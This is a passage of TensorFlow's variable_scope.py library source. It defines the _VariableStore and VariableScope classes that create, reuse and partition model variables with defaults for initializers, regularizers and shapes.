"non-resource variables are not supported in the long term") @tf_export(v1=["disable_resource_variables"]) def disable_resource_variables(): """Opts out of resource variables. If your code needs tf.disable_resource_variables() to be called to work properly please file a bug. 
""" global _DEFAULT_USE_RESOURCE _DEFAULT_USE_RESOURCE = False class _VariableStore(object): """Variable store that carries a number of named Variables. New variable names and new variables can be created; all stored variables are initialized with the initializer passed to __init__. Attributes: vars: a dictionary with string names (same as passed in GetVar) as keys and the corresponding TensorFlow Variables as values. """ def __init__(self): """Create a variable store.""" self._vars = {} # A dictionary of the stored TensorFlow variables. self._partitioned_vars = {} # A dict of the stored PartitionedVariables. self._store_eager_variables = False def get_variable(self, name, shape=None, dtype=dtypes.float32, initializer=None, regularizer=None, reuse=None, trainable=None, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, custom_getter=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): """Gets an existing variable with these parameters or create a new one. If a variable with the given name is already stored, we return the stored variable. Otherwise, we create a new one. Set `reuse` to `True` when you only want to reuse existing Variables. Set `reuse` to `False` when you only want to create new Variables. Set `reuse` to None (the default) or tf.AUTO_REUSE when you want variables to be created if they don't exist or returned if they do. If initializer is `None` (the default), the default initializer passed in the constructor is used. If that one is `None` too, we use a new `glorot_uniform_initializer`. If initializer is a Tensor, we use it as a value and derive the shape from the initializer. If a partitioner is provided, a `PartitionedVariable` is returned. Accessing this object as a `Tensor` returns the shards concatenated along the partition axis. Some useful partitioners are available. See, e.g., `variable_axis_size_partitioner` and `min_max_variable_partitioner`. 
Args: name: The name of the new or existing variable. shape: Shape of the new or existing variable. dtype: Type of the new or existing variable (defaults to `DT_FLOAT`). initializer: Initializer for the variable. regularizer: A (Tensor -> Tensor or None) function; the result of applying it on a newly created variable will be added to the collection GraphKeys.REGULARIZATION_LOSSES and can be used for regularization. reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of variables. When eager execution is enabled this argument is always forced to be False. trainable: If `True` also add the variable to the graph collection `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable` defaults to `True` unless `synchronization` is set to `ON_READ`. collections: List of graph collections keys to add the `Variable` to. Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`). caching_device: Optional device string or function describing where the Variable should be cached for reading. Defaults to the Variable's device. If not `None`, caches on another device. Typical use is to cache on the device where the Ops using the `Variable` reside, to deduplicate copying through `Switch` and other conditional statements. partitioner: Optional callable that accepts a fully defined `TensorShape` and dtype of the `Variable` to be created, and returns a list of partitions for each axis (currently only one axis can be partitioned). validate_shape: If False, allows the variable to be initialized with a value of unknown shape. If True, the default, the shape of initial_value must be known. use_resource: If False, creates a regular Variable. If True, creates instead an experimental ResourceVariable which has well-defined semantics. Defaults to False (will later change to True). When eager execution is enabled this argument is always forced to be true. 
custom_getter: Callable that takes as a first argument the true getter, and allows overwriting the internal get_variable method. The signature of `custom_getter` should match that of this method, but the most future-proof version will allow for changes: `def custom_getter(getter, *args, **kwargs)`. Direct access to all `get_variable` parameters is also allowed: `def custom_getter(getter, name, *args, **kwargs)`. A simple identity custom getter that simply creates variables with modified names is: ```python def custom_getter(getter, name, *args, **kwargs): return getter(name + '_suffix', *args, **kwargs) ``` constraint: An optional projection function to be applied to the variable after being updated by an `Optimizer` (e.g. used to implement norm constraints or value constraints for layer weights). The function must take as input the unprojected Tensor representing the value of the variable and return the Tensor for the projected value (which must have the same shape). Constraints are not safe to use when doing asynchronous distributed training. synchronization: Indicates when a distributed a variable will be aggregated. Accepted values are constants defined in the class `tf.VariableSynchronization`. By default the synchronization is set to `AUTO` and the current `DistributionStrategy` chooses when to synchronize. If `synchronization` is set to `ON_READ`, `trainable` must not be set to `True`. aggregation: Indicates how a distributed variable will be aggregated. Accepted values are constants defined in the class `tf.VariableAggregation`. Returns: The created or existing `Variable` (or `PartitionedVariable`, if a partitioner was used). Raises: ValueError: when creating a new variable and shape is not declared, when reusing a variable and specifying a conflicting shape, or when violating reuse during variable creation. RuntimeError: when eager execution is enabled and not called from an EagerVariableStore. 
""" if custom_getter is not None and not callable(custom_getter): raise ValueError( "Passed a custom_getter which is not callable: %s" % custom_getter) with ops.init_scope(): if context.executing_eagerly(): # Variable creation and initialization takes place in `init_scope`s; # as such, if an `init_scope` lifts us into the eager context, then we # need to use `ResourceVariable`s. use_resource = True # Note that it's fine to reuse eager variables whose initialization was # lifted from a function-building graph into the eager context (that's why # the following clause is not wrapped in an `init_scope`); lifted variables # are tracked by the graph's `VariableStore`. if context.executing_eagerly(): if not self._store_eager_variables and reuse: raise RuntimeError( "When eager execution is enabled variable reuse is only supported" " when an EagerVariableStore is active. See the documentation on" " EagerVariableStore for example usage.") if self._store_eager_variables: reuse = AUTO_REUSE # If a *_ref type is passed in an error would be triggered further down the # stack. We prevent this using base_dtype to get a non-ref version of the # type, before doing anything else. When _ref types are removed in favor of # resources, this line can be removed. try: dtype = dtype.base_dtype except AttributeError: # .base_dtype not existing means that we will try and use the raw dtype # which was passed in - this might be a NumPy type which is valid. pass # This is the main logic of get_variable. However, custom_getter # may override this logic. So we save it as a callable and pass # it to custom_getter. # Note: the parameters of _true_getter, and their documentation, match # *exactly* item-for-item with the docstring of this method. 
def _true_getter( # pylint: disable=missing-docstring name, shape=None, dtype=dtypes.float32, initializer=None, regularizer=None, reuse=None, trainable=None, collections=None, caching_device=None, partitioner=None, validate_shape=True, use_resource=None, constraint=None, synchronization=VariableSynchronization.AUTO, aggregation=VariableAggregation.NONE): is_scalar = (shape is not None and isinstance(shape, collections_lib.Sequence) and not shape) # Partitioned variable case if partitioner is not None and not is_scalar: if not callable(partitioner): raise ValueError( "Partitioner must be callable, but received: %s" % partitioner) with ops.name_scope(None): return self._get_partitioned_variable(name=name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=partitioner, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint) # Special case for partitioned variable to allow reuse without having to # specify partitioner. if (reuse is True and partitioner is None and name in self._partitioned_vars): return self._get_partitioned_variable(name=name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, partitioner=None, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint) # Single variable case if "%s/part_0" % name in self._vars: raise ValueError( "No partitioner was provided, but a partitioned version of the " "variable was found: %s/part_0. Perhaps a variable of the same " "name was already created with partitioning?" 
% name) return self._get_single_variable( name=name, shape=shape, dtype=dtype, initializer=initializer, regularizer=regularizer, reuse=reuse, trainable=trainable, collections=collections, caching_device=caching_device, validate_shape=validate_shape, use_resource=use_resource, constraint=constraint, synchronization=synchronization, aggregation=aggregation) # Set trainable value based on synchronization value. trainable = _get_trainable_value( synchronization=synchronization, trainable=trainable) if custom_getter is not None: # Handle backwards compatibility with getter arguments that were added # to the API after users started writing custom getters. custom_getter_kwargs = { "getter": _true_getter, "name": name, "shape": shape, "dtype": dtype, "initializer": initializer, "regularizer": regularizer, "reuse": reuse, "trainable": trainable, "collections": collections, "caching_device": caching_device, "partitioner": partitioner, "validate_shape": validate_shape, "use_resource": use_resource, "synchronization": synchronization, "aggregation": aggregation, } # `fn_args` and `has_kwargs` can handle functions, `functools.partial`, # `lambda`. 
      # --- continuation of _VariableStore.get_variable (the `def` begins in an
      # earlier chunk): dispatch through the user-supplied custom getter,
      # forwarding `constraint` only when the getter's signature can accept it.
      if ("constraint" in function_utils.fn_args(custom_getter) or
          function_utils.has_kwargs(custom_getter)):
        custom_getter_kwargs["constraint"] = constraint
      return custom_getter(**custom_getter_kwargs)
    else:
      # No custom getter configured: call the true implementation directly.
      return _true_getter(
          name,
          shape=shape,
          dtype=dtype,
          initializer=initializer,
          regularizer=regularizer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          partitioner=partitioner,
          validate_shape=validate_shape,
          use_resource=use_resource,
          constraint=constraint,
          synchronization=synchronization,
          aggregation=aggregation)

  def _get_partitioned_variable(self,
                                name,
                                partitioner,
                                shape=None,
                                dtype=dtypes.float32,
                                initializer=None,
                                regularizer=None,
                                reuse=None,
                                trainable=None,
                                collections=None,
                                caching_device=None,
                                validate_shape=True,
                                use_resource=None,
                                constraint=None):
    """Gets or creates a sharded variable list with these parameters.

    The `partitioner` must be a callable that accepts a fully defined
    `TensorShape` and returns a sequence of integers (the `partitions`).
    These integers describe how to partition the given sharded `Variable`
    along the given dimension.  That is, `partitions[1] = 3` means split
    the `Variable` into 3 shards along dimension 1.  Currently, sharding
    along only one axis is supported.

    If the list of variables with the given name (prefix) is already stored,
    we return the stored variables. Otherwise, we create a new one.

    Set `reuse` to `True` when you only want to reuse existing Variables.
    Set `reuse` to `False` when you only want to create new Variables.
    Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
    variables to be created if they don't exist or returned if they do.

    If initializer is `None` (the default), the default initializer passed in
    the constructor is used. If that one is `None` too, we use a new
    `glorot_uniform_initializer`. If initializer is a Tensor, we use
    it as a value and derive the shape from the initializer.

    If the initializer is a callable, then it will be called for each shard.
    Otherwise the initializer should match the shape of the entire sharded
    Variable, and it will be sliced accordingly for each shard.

    Some useful partitioners are available.  See, e.g.,
    `variable_axis_size_partitioner` and `min_max_variable_partitioner`.

    Args:
      name: the name of the new or existing sharded variable.
      partitioner: Optional callable that accepts a fully defined `TensorShape`
        and `dtype` of the Variable to be created, and returns a list of
        partitions for each axis (currently only one axis can be partitioned).
      shape: shape of the new or existing sharded variable.
      dtype: type of the new or existing sharded variable
        (defaults to `DT_FLOAT`).
      initializer: initializer for the sharded variable.
      regularizer: a (Tensor -> Tensor or None) function; the result of
        applying it on a newly created variable will be added to the collection
        GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
      reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
        of variables.
      trainable: If `True` also add the variable to the graph collection
        `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
      collections: List of graph collections keys to add the Variable to.
        Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
      caching_device: Optional device string or function describing where the
        Variable should be cached for reading.  Defaults to the Variable's
        device.  If not `None`, caches on another device.  Typical use is to
        cache on the device where the Ops using the Variable reside, to
        deduplicate copying through `Switch` and other conditional statements.
      validate_shape: If False, allows the variable to be initialized with a
        value of unknown shape. If True, the default, the shape of
        initial_value must be known.
      use_resource: If False, creates a regular Variable. If True, creates an
        experimental ResourceVariable which has well-defined semantics.
        Defaults to False (will later change to True).
      constraint: An optional projection function to be applied to the variable
        after being updated by an `Optimizer` (e.g. used to implement norm
        constraints or value constraints for layer weights). The function must
        take as input the unprojected Tensor representing the value of the
        variable and return the Tensor for the projected value
        (which must have the same shape). Constraints are not safe to
        use when doing asynchronous distributed training.

    Returns:
      A `PartitionedVariable` object.

    Raises:
      ValueError: when creating a new variable and shape is not declared,
        when reusing a variable and specifying a conflicting shape,
        when violating reuse during variable creation, or if an existing
        sharded variable exists for the given name but with different sharding.
    """
    if context.executing_eagerly():
      raise NotImplementedError("Partitioned variables are not yet supported "
                                "when eager execution is enabled.")

    initializing_from_value = initializer is not None and isinstance(
        initializer, ops.Tensor)
    reuse_without_partition = reuse and not partitioner

    # A name collision with an UNpartitioned variable of the same name is a
    # hard error: the two storage layouts are incompatible.
    if name in self._vars:
      raise ValueError(
          "A partitioner was provided, but an unpartitioned version of the "
          "variable was found: %s. Perhaps a variable of the same name was "
          "already created without partitioning?" % name)

    shape = tensor_shape.as_shape(shape)
    if initializing_from_value:
      shape = shape.merge_with(initializer.get_shape())

    # Validate the partitioner's output before doing any slicing: the shape
    # must be fully defined and the partition list must match its rank.
    if not reuse_without_partition:
      if not shape.is_fully_defined():
        raise ValueError("Shape of a new partitioned variable (%s) must be "
                         "fully defined, but instead was %s."
                         % (name, shape))

      if shape.ndims < 1:
        raise ValueError("A partitioned Variable must have rank at least 1, "
                         "shape: %s" % shape)

      partitions = partitioner(shape=shape, dtype=dtype)

      if not isinstance(partitions, collections_lib.Sequence):
        raise ValueError("Partitioner must return a sequence, but saw: %s"
                         % partitions)

      if len(partitions) != shape.ndims:
        raise ValueError(
            "Partitioner returned a partition list that does not match the "
            "Variable's rank: %s vs. %s" % (partitions, shape))

      if any([p < 1 for p in partitions]):
        raise ValueError(
            "Partitioner returned zero partitions for some axes: %s" %
            partitions)

    # Reuse path: return the previously created PartitionedVariable after
    # checking that shape, dtype and partitioning all agree.
    if name in self._partitioned_vars:
      if reuse is False:
        raise ValueError(
            "Partitioned variable with name %s already exists. Did you mean to "
            "set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)

      existing_var = self._partitioned_vars[name]
      if not shape.is_compatible_with(existing_var.get_shape()):
        raise ValueError(
            "Trying to reuse partitioned variable %s, but specified shape %s "
            "and found shape %s." % (name, shape, existing_var.get_shape()))
      if not dtype.is_compatible_with(existing_var.dtype):
        raise ValueError(
            "Trying to reuse partitioned variable %s, but specified dtype %s "
            "and found dtype %s." % (name, dtype.name, existing_var.dtype.name))

      # pylint: disable=protected-access
      if (not reuse_without_partition and
          existing_var._get_partitions() != partitions):
        raise ValueError(
            "Trying to reuse partitioned variable %s, but specified partitions "
            "%s and found partitions %s." %
            (name, partitions, existing_var._get_partitions()))
      # pylint: enable=protected-access

      return existing_var

    if reuse is True:
      raise ValueError("PartitionedVariable %s does not exist, or was not "
                       "created with tf.get_variable(). Did you mean to set "
                       "reuse=False or reuse=tf.AUTO_REUSE in VarScope?"
                       % name)

    slice_dim, slice_shape = _compute_slice_dim_and_shape(
        shape.as_list(), partitions)

    vs = []
    num_slices = partitions[slice_dim]
    # When the dimension does not divide evenly, the first
    # `num_slices_with_excess` shards each get one extra element.
    num_slices_with_excess = shape[slice_dim].value % num_slices

    slice_offset = [0] * shape.ndims

    # Sanity-check against a previously created, differently sharded set of
    # per-part variables under the same name prefix.
    if "%s/part_0" % name in self._vars:
      if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
        raise ValueError(
            "Partitioner returned a different partitioning than what was "
            "already found. Partitioner returned %d shards, and shard "
            "%s/part_0 was found, but %s/part_%d was not."
            % (num_slices, name, name, num_slices - 1))
      if "%s/part_%d" % (name, num_slices) in self._vars:
        raise ValueError(
            "Partitioner returned a different partitioning than what was "
            "already found. Partitioner returned %d shards, and shard "
            "%s/part_0 was found, but so was the extra shard %s/part_%d."
            % (num_slices, name, name, num_slices))

    for i in xrange(num_slices):
      var_shape = slice_shape[:]
      var_offset = slice_offset[:]
      partition_info = _PartitionInfo(
          full_shape=shape.as_list(), var_offset=var_offset)
      if i < num_slices_with_excess:
        var_shape[slice_dim] += 1
      slice_offset[slice_dim] += var_shape[slice_dim]

      var_full_name = "%s/part_%d" % (name, i)
      with ops.name_scope(var_full_name + "/PartitionedInitializer"):
        # Create the tensor to initialize the variable with default value.
        if initializer is None:
          init, initializing_from_value = self._get_default_initializer(
              name=name, shape=shape, dtype=dtype)
          if initializing_from_value:
            init_shape = None
          else:
            init_shape = var_shape
        elif callable(initializer):
          # Callable initializers are invoked once per shard with the shard's
          # own shape (via init_shape below).
          init = initializer
          init_shape = var_shape
        elif isinstance(initializer, ops.Tensor):
          # A full-size Tensor initializer is sliced to this shard's region.
          init = array_ops.slice(initializer, var_offset, var_shape)
          # Use the dtype of the given tensor.
          dtype = init.dtype.base_dtype
          init_shape = None
        else:
          init = ops.convert_to_tensor(initializer, dtype=dtype)
          init = array_ops.slice(init, var_offset, var_shape)
          init_shape = None

      with ops.name_scope(None):
        var = self._get_single_variable(
            name=var_full_name,
            shape=init_shape,
            dtype=dtype,
            initializer=init,
            partition_info=partition_info,
            regularizer=regularizer,
            reuse=reuse,
            trainable=trainable,
            collections=collections,
            caching_device=caching_device,
            validate_shape=validate_shape,
            use_resource=use_resource,
            constraint=constraint)

      # pylint: disable=protected-access
      var._set_save_slice_info(variables.Variable.SaveSliceInfo(
          name, shape.as_list(), var_offset, var_shape))
      vs.append(var)
      # pylint: enable=protected-access

    # pylint: disable=protected-access
    partitioned_var = variables.PartitionedVariable(name=name,
                                                    shape=shape,
                                                    dtype=dtype,
                                                    variable_list=vs,
                                                    partitions=partitions)
    # pylint: enable=protected-access

    self._partitioned_vars[name] = partitioned_var
    return partitioned_var

  def _get_single_variable(self,
                           name,
                           shape=None,
                           dtype=dtypes.float32,
                           initializer=None,
                           regularizer=None,
                           partition_info=None,
                           reuse=None,
                           trainable=None,
                           collections=None,
                           caching_device=None,
                           validate_shape=True,
                           use_resource=None,
                           constraint=None,
                           synchronization=VariableSynchronization.AUTO,
                           aggregation=VariableAggregation.NONE):
    """Get or create a single Variable (e.g. a shard or entire variable).

    See the documentation of get_variable above (ignore partitioning components)
    for details.

    Args:
      name: see get_variable.
      shape: see get_variable.
      dtype: see get_variable.
      initializer: see get_variable.
      regularizer: see get_variable.
      partition_info: _PartitionInfo object.
      reuse: see get_variable.
      trainable: see get_variable.
      collections: see get_variable.
      caching_device: see get_variable.
      validate_shape: see get_variable.
      use_resource: see get_variable.
      constraint: see get_variable.
      synchronization: see get_variable.
      aggregation: see get_variable.

    Returns:
      A Variable.
      See documentation of get_variable above.

    Raises:
      ValueError: See documentation of get_variable above.
    """
    # Set to true if initializer is a constant.
    initializing_from_value = False
    if initializer is not None and not callable(initializer):
      initializing_from_value = True

    if shape is not None and initializing_from_value:
      raise ValueError("If initializer is a constant, do not specify shape.")

    dtype = dtypes.as_dtype(dtype)
    shape = tensor_shape.as_shape(shape)

    if name in self._vars:
      # Here we handle the case when returning an existing variable.
      if reuse is False:
        tb = self._vars[name].op.traceback[::-1]
        # Throw away internal tf entries and only take a few lines.
        tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
        raise ValueError("Variable %s already exists, disallowed."
                         " Did you mean to set reuse=True or "
                         "reuse=tf.AUTO_REUSE in VarScope? "
                         "Originally defined at:\n\n%s" % (
                             name, "".join(traceback.format_list(tb))))
      found_var = self._vars[name]
      if not shape.is_compatible_with(found_var.get_shape()):
        raise ValueError("Trying to share variable %s, but specified shape %s"
                         " and found shape %s." % (name, shape,
                                                   found_var.get_shape()))
      if not dtype.is_compatible_with(found_var.dtype):
        dtype_str = dtype.name
        found_type_str = found_var.dtype.name
        raise ValueError("Trying to share variable %s, but specified dtype %s"
                         " and found dtype %s." % (name, dtype_str,
                                                   found_type_str))
      return found_var

    # The code below handles only the case of creating a new variable.
    if reuse is True:
      raise ValueError("Variable %s does not exist, or was not created with "
                       "tf.get_variable(). Did you mean to set "
                       "reuse=tf.AUTO_REUSE in VarScope?" % name)

    # Create the tensor to initialize the variable with default value.
    if initializer is None:
      initializer, initializing_from_value = self._get_default_initializer(
          name=name, shape=shape, dtype=dtype)
    # Enter an init scope when creating the initializer.
    with ops.init_scope():
      if initializing_from_value:
        init_val = initializer
        variable_dtype = None
      else:
        # Instantiate initializer if provided initializer is a type object.
        if isinstance(initializer, type(init_ops.Initializer)):
          initializer = initializer(dtype=dtype)
        if shape and shape.is_fully_defined():
          init_val = lambda: initializer(  # pylint: disable=g-long-lambda
              shape.as_list(), dtype=dtype, partition_info=partition_info)
        elif not tf_inspect.getargspec(initializer).args:
          init_val = initializer
        else:
          raise ValueError("You can only pass an initializer function that "
                           "expects no arguments to its callable when the "
                           "shape is not fully defined. The given initializer "
                           "function expects the following args %s" %
                           tf_inspect.getargspec(initializer).args)
        variable_dtype = dtype.base_dtype

    # Create the variable.
    if use_resource is None:
      # Set the default value if unspecified.
      use_resource = _DEFAULT_USE_RESOURCE
    v = variables.VariableV1(
        initial_value=init_val,
        name=name,
        trainable=trainable,
        collections=collections,
        caching_device=caching_device,
        dtype=variable_dtype,
        validate_shape=validate_shape,
        constraint=constraint,
        use_resource=use_resource,
        synchronization=synchronization,
        aggregation=aggregation)
    if context.executing_eagerly() and self._store_eager_variables:
      # Eager store mode: mirror graph-mode collection bookkeeping explicitly,
      # since the Variable constructor does not do it under eager execution.
      if collections:
        ops.add_to_collections(collections, v)
      else:
        ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
      if trainable:
        ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)

    if not context.executing_eagerly() or self._store_eager_variables:
      # In eager mode we do not want to keep default references to Variable
      # objects as this will prevent their memory from being released.
      self._vars[name] = v
    logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
                 format(shape), initializer)

    # Run the regularizer if requested and save the resulting loss.
    if regularizer:
      with ops.colocate_with(v):
        with ops.name_scope(name + "/Regularizer/"):
          loss = regularizer(v)
        if loss is not None:
          if context.executing_eagerly():
            v_name = "v_%s" % type(v)
            loss_name = "loss_%s" % type(loss)
          else:
            v_name = v.name
            loss_name = loss.name
          logging.vlog(1, "Applied regularizer to %s and added the result %s "
                       "to REGULARIZATION_LOSSES.", v_name, loss_name)
          ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
    return v

  # Initialize variable when no initializer provided
  def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
    """Provide a default initializer and a corresponding value.

    Args:
      name: see get_variable.
      shape: see get_variable.
      dtype: see get_variable.

    Returns:
      initializer and initializing_from_value. See get_variable above.

    Raises:
      ValueError: When giving unsupported dtype.
    """
    del shape
    # If dtype is DT_FLOAT, provide a uniform unit scaling initializer
    if dtype.is_floating:
      initializer = init_ops.glorot_uniform_initializer()
      initializing_from_value = False
    # If dtype is DT_INT/DT_UINT, provide a default value `zero`
    # If dtype is DT_BOOL, provide a default value `FALSE`
    elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
          dtype == dtypes.string):
      initializer = init_ops.zeros_initializer()
      initializing_from_value = False
    # NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
    else:
      raise ValueError("An initializer for variable %s of %s is required" %
                       (name, dtype.base_dtype))

    return initializer, initializing_from_value


# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
  """Use this function to prevent regularization of variables."""
  return None


# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
  """Variable scope object to carry defaults to provide to `get_variable`.
  Many of the arguments we need for `get_variable` in a variable store are
  most easily handled with a context. This object is used for the defaults.

  Attributes:
    name: name of the current scope, used as prefix in get_variable.
    initializer: default initializer passed to get_variable.
    regularizer: default regularizer passed to get_variable.
    reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
      get_variable. When eager execution is enabled this argument is always
      forced to be False.
    caching_device: string, callable, or None: the caching device passed to
      get_variable.
    partitioner: callable or `None`: the partitioner passed to `get_variable`.
    custom_getter: default custom getter passed to get_variable.
    name_scope: The name passed to `tf.name_scope`.
    dtype: default type passed to get_variable (defaults to DT_FLOAT).
    use_resource: if False, create a normal Variable; if True create an
      experimental ResourceVariable with well-defined semantics. Defaults
      to False (will later change to True). When eager execution is enabled
      this argument is always forced to be True.
    constraint: An optional projection function to be applied to the variable
      after being updated by an `Optimizer` (e.g. used to implement norm
      constraints or value constraints for layer weights). The function must
      take as input the unprojected Tensor representing the value of the
      variable and return the Tensor for the projected value
      (which must have the same shape). Constraints are not safe to
      use when doing asynchronous distributed training.
  """

  def __init__(self,
               reuse,
               name="",
               initializer=None,
               regularizer=None,
               caching_device=None,
               partitioner=None,
               custom_getter=None,
               name_scope="",
               dtype=dtypes.float32,
               use_resource=None,
               constraint=None):
    """Creates a new VariableScope with the given properties."""
    self._name = name
    self._initializer = initializer
    self._regularizer = regularizer
    self._reuse = reuse
    self._caching_device = caching_device
    self._partitioner = partitioner
    self._custom_getter = custom_getter
    self._name_scope = name_scope
    self._dtype = dtype
    self._use_resource = use_resource
    self._constraint = constraint
    if context.executing_eagerly():
      # Eager mode forces AUTO_REUSE + resource variables and rejects
      # features (caching devices, partitioners) that are graph-only.
      if self._caching_device is not None:
        raise NotImplementedError("Caching devices is not yet supported "
                                  "when eager execution is enabled.")
      if self._partitioner is not None:
        raise NotImplementedError("Partitioned variables are not yet supported "
                                  "when eager execution is enabled.")
      self._reuse = AUTO_REUSE
      self._use_resource = True

  @property
  def name(self):
    return self._name

  @property
  def original_name_scope(self):
    return self._name_scope

  @property
  def reuse(self):
    return self._reuse

  @property
  def initializer(self):
    return self._initializer

  @property
  def dtype(self):
    return self._dtype

  @property
  def use_resource(self):
    return self._use_resource

  @property
  def regularizer(self):
    return self._regularizer

  @property
  def caching_device(self):
    return self._caching_device

  @property
  def partitioner(self):
    return self._partitioner

  @property
  def custom_getter(self):
    return self._custom_getter

  @property
  def constraint(self):
    return self._constraint

  def reuse_variables(self):
    """Reuse variables in this scope."""
    self._reuse = True

  def set_initializer(self, initializer):
    """Set initializer for this scope."""
    self._initializer = initializer

  def set_dtype(self, dtype):
    """Set data type for this scope."""
    self._dtype = dtype

  def set_use_resource(self, use_resource):
    """Sets whether to use ResourceVariables for this scope."""
    if context.executing_eagerly() and not use_resource:
      raise ValueError("When eager execution is enabled, "
                       "use_resource cannot be set to false.")
    self._use_resource = use_resource

  def set_regularizer(self, regularizer):
    """Set regularizer for this scope."""
    self._regularizer = regularizer

  def set_caching_device(self, caching_device):
    """Set caching_device for this scope."""
    if context.executing_eagerly():
      raise NotImplementedError("Caching devices are not yet supported "
                                "when eager execution is enabled.")
    self._caching_device = caching_device

  def set_partitioner(self, partitioner):
    """Set partitioner for this scope."""
    if partitioner and context.executing_eagerly():
      raise NotImplementedError("Partitioned variables are not yet supported "
                                "when eager execution is enabled.")
    self._partitioner = partitioner

  def set_custom_getter(self, custom_getter):
    """Set custom getter for this scope."""
    self._custom_getter = custom_getter

  def get_collection(self, name):
    """Get this scope's variables."""
    scope = self._name + "/" if self._name else ""
    return ops.get_collection(name, scope)

  def trainable_variables(self):
    """Get this scope's trainable variables."""
    return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)

  def global_variables(self):
    """Get this scope's global variables."""
    return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)

  def local_variables(self):
    """Get this scope's local variables."""
    return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)

  def get_variable(self,
                   var_store,
                   name,
                   shape=None,
                   dtype=None,
                   initializer=None,
                   regularizer=None,
                   reuse=None,
                   trainable=None,
                   collections=None,
                   caching_device=None,
                   partitioner=None,
                   validate_shape=True,
                   use_resource=None,
                   custom_getter=None,
                   constraint=None,
                   synchronization=VariableSynchronization.AUTO,
                   aggregation=VariableAggregation.NONE):
    """Gets an existing variable with this name or create a new one."""
    # Fill in any argument left as None from this scope's stored defaults.
    if regularizer is None:
      regularizer = self._regularizer
    if caching_device is None:
      caching_device = self._caching_device
    if partitioner is None:
      partitioner = self._partitioner
    if custom_getter is None:
      custom_getter = self._custom_getter

    if context.executing_eagerly():
      reuse = False
      use_resource = True
    else:
      if reuse is None:
        reuse = self._reuse
      if use_resource is None:
        use_resource = self._use_resource

    full_name = self.name + "/" + name if self.name else name
    # Variable names only depend on variable_scope (full_name here),
    # not name_scope, so we reset it below for the time of variable creation.
    with ops.name_scope(None):
      # Check that `initializer` dtype and `dtype` are consistent before
      # replacing them with defaults.
      if (dtype is not None and initializer is not None and
          not callable(initializer)):
        init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
        if init_dtype != dtype:
          raise ValueError("Initializer type '%s' and explicit dtype '%s' "
                           "don't match." % (init_dtype, dtype))
      if initializer is None:
        initializer = self._initializer
      if constraint is None:
        constraint = self._constraint
      if dtype is None:
        dtype = self._dtype
      return var_store.get_variable(
          full_name,
          shape=shape,
          dtype=dtype,
          initializer=initializer,
          regularizer=regularizer,
          reuse=reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          partitioner=partitioner,
          validate_shape=validate_shape,
          use_resource=use_resource,
          custom_getter=custom_getter,
          constraint=constraint,
          synchronization=synchronization,
          aggregation=aggregation)

  def _get_partitioned_variable(self,
                                var_store,
                                name,
                                shape=None,
                                dtype=None,
                                initializer=None,
                                regularizer=None,
                                trainable=None,
                                collections=None,
                                caching_device=None,
                                partitioner=None,
                                validate_shape=True,
                                use_resource=None,
                                constraint=None):
    """Gets an existing variable with this name or create a new one."""
    if context.executing_eagerly():
      raise NotImplementedError("Partitioned variables are not yet supported "
                                "when eager execution is enabled.")
    # Fill in any argument left as None from this scope's stored defaults.
    if initializer is None:
      initializer = self._initializer
    if regularizer is None:
      regularizer = self._regularizer
    if constraint is None:
      constraint = self._constraint
    if caching_device is None:
      caching_device = self._caching_device
    if partitioner is None:
      partitioner = self._partitioner
    if dtype is None:
      dtype = self._dtype
    if use_resource is None:
      use_resource = self._use_resource

    if self._custom_getter is not None:
      raise ValueError(
          "Private access to _get_partitioned_variable is not allowed when "
          "a custom getter is set. Current custom getter: %s. "
          "It is likely that you're using create_partitioned_variables. "
          "If so, consider instead using get_variable with a non-empty "
          "partitioner parameter instead." % self._custom_getter)

    if partitioner is None:
      raise ValueError("No partitioner was specified")

    # This allows the variable scope name to be used as the variable name if
    # this function is invoked with an empty name arg, for backward
    # compatibility with create_partitioned_variables().
    full_name_list = []
    if self.name:
      full_name_list.append(self.name)
    if name:
      full_name_list.append(name)
    full_name = "/".join(full_name_list)

    # Variable names only depend on variable_scope (full_name here),
    # not name_scope, so we reset it below for the time of variable creation.
    with ops.name_scope(None):
      # pylint: disable=protected-access
      return var_store._get_partitioned_variable(
          full_name,
          shape=shape,
          dtype=dtype,
          initializer=initializer,
          regularizer=regularizer,
          reuse=self.reuse,
          trainable=trainable,
          collections=collections,
          caching_device=caching_device,
          partitioner=partitioner,
          validate_shape=validate_shape,
          use_resource=use_resource,
          constraint=constraint)
      # pylint: enable=protected-access


